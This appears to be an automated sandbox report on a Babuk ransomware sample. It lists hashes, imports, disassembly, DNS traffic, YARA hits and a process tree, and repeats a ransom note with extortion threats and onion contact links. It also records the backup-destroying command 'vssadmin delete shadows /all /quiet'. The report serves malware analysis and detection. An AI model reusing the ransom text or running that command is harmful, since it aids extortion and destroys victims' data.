                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Pictures\Camera Roll\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Pictures\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Videos\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\bootTel.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):248
                                                                            Entropy (8bit):7.030508155318469
                                                                            Encrypted:false
                                                                            SSDEEP:6:ig6hTnFqSeKrET5OF/NXYrx1f0lQ6EFX5yhOaL0vtn:iy9TQEF1slQbFpysJ
                                                                            MD5:2FACD771F8EA6B9EC3B3249E3EC15080
                                                                            SHA1:F56158EF4DD88F9B70418958653C29AD651C4517
                                                                            SHA-256:F2E1EF7702B52B2FBD9A1F3CBA59CC2AF608E0BC3C7A6F16F2B43B75A3E31535
                                                                            SHA-512:4F74C6C1EE07041B52D1D22A8B8FFFB092BD968D163C90D50A9B284EF48D005067D041473005C719B3433B0BB8A1D0E8CA9F7BB06FC433D4B9F95294B32C6078
                                                                            Malicious:false
                                                                            Preview: P.9G.$....f.).6V.$....]z..@M_dl'?..8..>...I...i2.........)..o.......70....g.......S..K"..v..U2..Vf..b4.W.'QIs...#m.R.la.2......h........:..c.........|.........*..._...)....KY.2`R......#OE.9....4>...f....choung dong looks like hot dog!!

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):5.930729888759111
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:babuk_v5.exe
                                                                            File size:30208
                                                                            MD5:67e49cfcd12103b5ef2f9f331f092dbe
                                                                            SHA1:72cad5a81ce546b42844b5b8fc2ab55e99f2b5d4
                                                                            SHA256:58ccba4fb2b3ed8b5f92adddd6ee331a6afdedfc755145e0432a7cb324c28053
                                                                            SHA512:21fa0d1be0d5be2da8c4c68357e1e294503d87c21a304c5811669eaa9aba29b6cfcd077d083547e2f41269b12c6a8da5ad2ea0f1613d9a96917ea01c69fcb087
                                                                            SSDEEP:384:v2UsMH+SV5xjfd7IRfj1LKWQkD/e42pRwtkOEyOc0QI0rRrASD:PscR5x5kTKWQY/e42pKtkOETcfJrV
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...m...l...m...l...m...l...l...lG..m...lG..m...lRich...l........................PE..L......`.................\.

                                                                            File Icon

                                                                            Icon Hash:00828e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x405ec0
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x6011CFE3 [Wed Jan 27 20:41:07 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:e427e2333fa70c2cb1ef7892dc17f199

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            sub esp, 0000009Ch
                                                                            mov eax, dword ptr [004071C8h]
                                                                            xor eax, ebp
                                                                            mov dword ptr [ebp-04h], eax
                                                                            call 00007F32F87DF27Dh
                                                                            mov dword ptr [00407270h], eax
                                                                            cmp dword ptr [00407270h], 00000000h
                                                                            je 00007F32F87DF962h
                                                                            push 00407274h
                                                                            push 00000000h
                                                                            push 00000000h
                                                                            push 00000094h
                                                                            push 00401798h
                                                                            mov eax, dword ptr [00407270h]
                                                                            push eax
                                                                            call dword ptr [00408028h]
                                                                            push 00407278h
                                                                            call dword ptr [00408054h]
                                                                            mov dword ptr [ebp-2Ch], 00000000h
                                                                            lea ecx, dword ptr [ebp-2Ch]
                                                                            push ecx
                                                                            call dword ptr [00408070h]
                                                                            push eax
                                                                            call dword ptr [0040815Ch]
                                                                            mov dword ptr [ebp-68h], eax
                                                                            push 0040240Ch
                                                                            push 00000000h
                                                                            push 001F0001h
                                                                            call dword ptr [004080C4h]
                                                                            mov dword ptr [ebp-00000090h], eax
                                                                            cmp dword ptr [ebp-00000090h], 00000000h
                                                                            jne 00007F32F87DF319h
                                                                            push 0040242Ch
                                                                            push 00000000h
                                                                            push 00000000h
                                                                            call dword ptr [00408098h]
                                                                            mov dword ptr [ebp-00000090h], eax
                                                                            jmp 00007F32F87DF30Ah
                                                                            push 00000000h
                                                                            call dword ptr [004080A4h]
                                                                            push 00000000h
                                                                            push 00000000h
                                                                            call dword ptr [004080B0h]
                                                                            call 00007F32F87DF927h
                                                                            call 00007F32F87DDCC2h
                                                                            push 0040244Ch

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x81740xa0.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000x464.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x24b00x38.text
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x24e80x40.text
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x170.idata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x5ad30x5c00False0.437457540761data6.09290090795IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .data0x70000x5b40x200False0.4765625data4.01435931521IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .idata0x80000xa060xc00False0.4052734375data4.58142496101IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .CRT0x90000x80x200False0.03515625data0.114463381259IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0xa0000x4640x600False0.666666666667data5.44035365652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllGetModuleHandleA, GetProcAddress, LoadLibraryA, lstrcmpW, lstrlenW, SetVolumeMountPointW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, CreateFileW, WriteFile, DeleteCriticalSection, lstrlenA, GetCommandLineW, FindClose, FindFirstFileW, FindNextFileW, GetFileSizeEx, GetLogicalDrives, ReadFile, OpenProcess, SetFilePointerEx, WaitForSingleObject, CreateMutexA, WaitForMultipleObjects, GetCurrentProcessId, ExitProcess, CreateThread, ExitThread, SetProcessShutdownParameters, GetSystemInfo, lstrcmpiW, lstrcpyW, lstrcatW, OpenMutexA, MoveFileExW, WideCharToMultiByte, HeapAlloc, HeapFree, GetProcessHeap, ReleaseSemaphore, CreateSemaphoreA, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetTickCount, TerminateProcess, GetCurrentProcess, Sleep, GetLastError, CloseHandle, GetVolumePathNamesForVolumeNameW, GetDriveTypeW, FindVolumeClose, FindNextVolumeW, SetFileAttributesW, FindFirstVolumeW, IsProcessorFeaturePresent
                                                                            USER32.dllwsprintfA
                                                                            ADVAPI32.dllCryptEncrypt, CryptDestroyKey, CryptReleaseContext, CryptAcquireContextW, QueryServiceStatusEx, OpenServiceA, OpenSCManagerA, EnumDependentServicesA, ControlService, CloseServiceHandle, CryptImportKey
                                                                            SHELL32.dllSHEmptyRecycleBinA, CommandLineToArgvW, ShellExecuteW
                                                                            NETAPI32.dllNetShareEnum, NetApiBufferFree
                                                                            RstrtMgr.DLLRmGetList, RmRegisterResources, RmEndSession, RmStartSession
                                                                            MPR.dllWNetOpenEnumW, WNetCloseEnum, WNetEnumResourceW, WNetGetConnectionW

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Feb 2, 2021 17:55:06.199619055 CET4944853192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:06.252374887 CET53494488.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:07.361798048 CET6034253192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:07.411933899 CET53603428.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:08.362724066 CET6134653192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:08.413491011 CET53613468.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:09.642865896 CET5177453192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:09.690690994 CET53517748.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:10.880805969 CET5602353192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:10.931533098 CET53560238.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:11.869656086 CET5838453192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:11.917570114 CET53583848.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:13.079200029 CET6026153192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:13.138371944 CET53602618.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:14.131494045 CET5606153192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:14.189193010 CET53560618.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:16.396075010 CET5833653192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:16.449244976 CET53583368.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:17.531984091 CET5378153192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:17.582871914 CET53537818.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:19.629098892 CET5406453192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:19.682102919 CET53540648.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:20.796991110 CET5281153192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:20.849765062 CET53528118.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:21.631088018 CET5529953192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:21.679239035 CET53552998.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:22.443516016 CET6374553192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:22.491380930 CET53637458.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:23.644028902 CET5005553192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:23.694777012 CET53500558.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:24.812397957 CET6137453192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:24.861037016 CET53613748.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:40.374454975 CET5033953192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:40.425246000 CET53503398.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:41.035610914 CET6330753192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:41.093410969 CET53633078.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:57.255742073 CET4969453192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:57.312194109 CET53496948.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:57.405549049 CET5498253192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:57.466397047 CET53549828.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:55:57.524831057 CET5001053192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:55:57.575660944 CET53500108.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:56:01.296575069 CET6371853192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:56:01.347445011 CET53637188.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:56:05.691416025 CET6211653192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:56:05.742381096 CET53621168.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:56:40.345879078 CET6381653192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:56:40.434422016 CET53638168.8.8.8192.168.2.6
                                                                            Feb 2, 2021 17:58:00.374592066 CET5501453192.168.2.68.8.8.8
                                                                            Feb 2, 2021 17:58:00.435359001 CET53550148.8.8.8192.168.2.6

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Feb 2, 2021 17:58:00.374592066 CET192.168.2.68.8.8.80xd74Standard query (0)cdn.onenote.netA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Feb 2, 2021 17:58:00.435359001 CET8.8.8.8192.168.2.60xd74No error (0)cdn.onenote.netcdn.onenote.net.edgekey.netCNAME (Canonical name)IN (0x0001)

                                                                            Code Manipulations

                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: babuk_v5.exe PID: 4984 Parent PID: 5996

                                                                            General

                                                                            Start time:17:55:11
                                                                            Start date:02/02/2021
                                                                            Path:C:\Users\user\Desktop\babuk_v5.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\babuk_v5.exe'
                                                                            Imagebase:0xbf0000
                                                                            File size:30208 bytes
                                                                            MD5 hash:67E49CFCD12103B5EF2F9F331F092DBE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000000.335583534.0000000000BF1000.00000020.00020000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.420310947.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.421468331.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.412867169.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.411482740.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.421137860.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.411862150.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.419959542.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.374612389.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.418775876.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.412100680.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_babuk, Description: Yara detected Babuk Ransomware, Source: 00000001.00000003.419289818.0000000000E86000.00000004.00000001.sdmp, Author: Joe Security
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: cmd.exe PID: 4712 Parent PID: 4984

                                                                            General

                                                                            Start time:17:55:16
                                                                            Start date:02/02/2021
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet
                                                                            Imagebase:0x7ff7180e0000
                                                                            File size:273920 bytes
                                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: conhost.exe PID: 1276 Parent PID: 4712

                                                                            General

                                                                            Start time:17:55:16
                                                                            Start date:02/02/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff61de10000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: vssadmin.exe PID: 6528 Parent PID: 4712

                                                                            General

                                                                            Start time:17:55:17
                                                                            Start date:02/02/2021
                                                                            Path:C:\Windows\System32\vssadmin.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:vssadmin.exe delete shadows /all /quiet
                                                                            Imagebase:0x7ff63c900000
                                                                            File size:145920 bytes
                                                                            MD5 hash:47D51216EF45075B5F7EAA117CC70E40
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Chronological Activities

                                                                            Analysis Process: SearchUI.exe PID: 6328 Parent PID: 792

                                                                            General

                                                                            Start time:17:56:00
                                                                            Start date:02/02/2021
                                                                            Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                            Imagebase:0x7ff72e680000
                                                                            File size:13606304 bytes
                                                                            MD5 hash:C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Chronological Activities

                                                                            Analysis Process: notepad.exe PID: 4656 Parent PID: 3440

                                                                            General

                                                                            Start time:17:57:23
                                                                            Start date:02/02/2021
                                                                            Path:C:\Windows\System32\notepad.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt
                                                                            Imagebase:0x7ff6a90d0000
                                                                            File size:245760 bytes
                                                                            MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            Chronological Activities

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >

                                                                              Analysis Process: SearchUI.exe PID: 6328 Parent PID: 792 SearchUI.exeCOMMON

                                                                              Executed Functions

                                                                              Function 000001B142602E00, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction ID: 2fa0f0abc2c6513d7209eca2540bc2d59ecbac5bfebbcb5130b68e4af3c830ba
                                                                              • Opcode Fuzzy Hash: 5b1c83934c948f928d350e11b0abd3787d90965bab55ba7a2e0d361205bdc91e
                                                                              • Instruction Fuzzy Hash: 6E9002544E540665D41451910C551DC60516788390FD54484481680148DF4D02D62192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600E00, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142601608, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142602E08, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
